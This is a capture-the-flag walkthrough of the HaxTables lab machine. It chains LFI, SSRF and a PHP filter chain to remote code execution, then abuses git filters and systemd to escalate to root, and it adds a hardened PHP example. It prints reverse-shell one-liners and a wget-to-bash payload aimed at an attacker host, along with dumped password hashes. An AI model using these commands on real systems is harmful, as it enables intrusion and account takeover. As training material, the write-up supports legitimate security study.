## Basic information

### Port scan

Ports 22 and 80 are open:
```
$ nmap -sC -sV -Pn 10.10.11.198
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 13:38 CST
Nmap scan report for 10.10.11.198
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: HaxTables
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.02 seconds
```
### Port 80

The API page reveals the domain names:

### Subdomain scan

Add hosts entries following the domain format found above, then keep probing for subdomains:
```
10.10.11.198 haxtables.htb api.haxtables.htb
```
Another subdomain, image, turns up:
```
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://haxtables.htb/" -H 'Host: FUZZ.haxtables.htb' -fs 1999

api                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
image                   [Status: 403, Size: 284, Words: 20, Lines: 10, Duration: 95ms]
```
### image.haxtables.htb

After adding it to hosts, a direct request returns 403:

### api.haxtables.htb

Calling the API with the sample client code it provides, one call fetches a remote file by URL, which gives LFI here:

## LFI

### .git on image

Reading files one by one, utils.php turns out to reference a git repository:
```
file:///var/www/html/index.php
file:///var/www/image/index.php
file:///var/www/image/utils.php
```
### image.haxtables.htb

Dump the code via git, but because of the 403 on image the tool's code needs a small change:

Modified version:

Then dump the git data:
```bash
./gitdumper.sh http://image.haxtables.htb/.git/ image_git_dump
```
With the file names obtained from the git data, keep reading code through the earlier LFI:

### actions/action_handler.php

action_handler contains an LFI:
```php
<?php
include_once 'utils.php';

if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);
} else {
    echo jsonify(['message' => 'No page specified!']);
}
?>
```
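For contrast, an added hardened replacement for this dispatch (example code written here, not the box's action_handler.php): the request value is only a key into an allowlist, so stream wrappers such as php://filter or file:// and traversal sequences never reach include(). The action names in ACTION_PAGES are hypothetical.

```php
<?php
// Added example, not the HaxTables code: a hardened replacement for the
// include($_GET['page']) dispatch in action_handler.php. The request value is
// only used as a key into an allowlist, so stream wrappers such as
// php://filter/... or file://... and traversal sequences never reach include().

// Hypothetical action names; the real ones would be the handlers this endpoint exposes.
const ACTION_PAGES = ['b64encode' => 'b64encode.php', 'hex' => 'hex.php'];

// Return the absolute path to include for $page, or null when $page is not a known action.
function resolve_action(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, ACTION_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ACTION_PAGES[$page]);
    // Defence in depth: the resolved file must exist and sit inside $baseDir.
    if ($base === false || $path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Stand-alone check: one allowlisted file plus the kinds of input an LFI probe sends.
    $dir = sys_get_temp_dir() . '/actions_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/hex.php', "<?php echo 'hex handler';");
    $probes = [
        'hex',                                                   // resolves
        '../../../etc/passwd',                                   // rejected
        'php://filter/convert.base64-encode/resource=utils.php', // rejected
        'file:///var/www/image/utils.php',                       // rejected
    ];
    foreach ($probes as $p) {
        printf("%-58s => %s\n", $p, resolve_action($p, $dir) ?? 'rejected');
    }
    unlink($dir . '/hex.php');
    rmdir($dir);
} else {
    include_once 'utils.php';
    $page = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : '';
    $target = resolve_action($page, __DIR__);
    if ($target === null) {
        http_response_code(400);
        echo jsonify(['message' => 'Unknown or missing page']);
        exit;
    }
    include $target;
}
```

Run with `php action_handler_hardened.php` to see only the allowlisted name resolve; served under Apache, the same function gates the include.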
### handler.php

The main site's handler has an SSRF: the received uri_path goes into make_api_call and is concatenated into the middle of the URL, so it needs some handling too:
```
file:///var/www/html/handler.php
file:///var/www/api/utils.php
```
### SSRF + LFI

So the handler's SSRF can be used to reach the LFI on image:

## LFI to RCE

See the references; this works the same way as the Pollution box:
```bash
# m
bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

python3 php_filter_chain_generator.py --chain '<?=`wget -O - 10.10.14.7/m|bash`?>'
```
Then substitute the page parameter to get a shell:

## svc

The www shell we obtained can run git-commit.sh as the svc user:

According to the code it performs a git commit; since git executes the filter commands defined in the repository's attributes and config during a commit, adding an attribute can make it run other actions:

We can initialize a new repository in /var/www/image, set an indent filter for all .php files, configure that filter's command to run a bash script that spawns a reverse shell, and finally run git-commit.sh as svc.
```bash
# /tmp/shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

chmod +x /tmp/shell
cd /var/www/image
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/shell
sudo -u svc /var/www/image/scripts/git-commit.sh
```
## user flag

The svc user's home directory holds a private key, which makes the following steps more convenient:
## Privilege escalation & root flag

svc can restart any service, so create a service of our own and abuse that:
```bash
echo '[Service]
Type=oneshot
ExecStart=bash /tmp/shell
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/root.service

sudo systemctl restart root
```
shadow:

```
root:$y$j9T$YrcgmNEZARoBVHavwBOPQ/$wIZaX9iidgZlQcbd8FsfhAK4e9f6CCS0R8zTG7iGZWC:19307:0:99999:7:::
svc:$y$j9T$T1FiJZK9ftARU8F2cRXIo/$l4ru4RucHv80YP2Nv2KwwZbJmem.ongM5S8FbfbOTp9:19307:0:99999:7:::
```
## References

Last updated: 2023-04-17 08:51:41